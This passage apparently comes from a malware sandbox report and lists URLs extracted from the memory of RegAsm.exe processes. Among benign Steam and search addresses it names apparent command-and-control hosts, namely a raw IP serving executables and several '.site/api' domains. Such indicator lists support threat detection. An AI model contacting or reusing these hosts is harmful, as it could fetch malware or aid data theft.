Source: RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9VWXYZ1234567890ininit.exe
Source: RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9s.exe
Source: RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9ta
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/api
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abnomalrkmu.site/apiL
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/$
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/api
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://absorptioniw.site/apiw
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/?format=json/
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chorusarorp.site/api
Source: RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chorusarorp.site/api.x
Source: RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.co
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000003C.00000002.2924485555.0000000000506000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004F6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004F6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004F6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
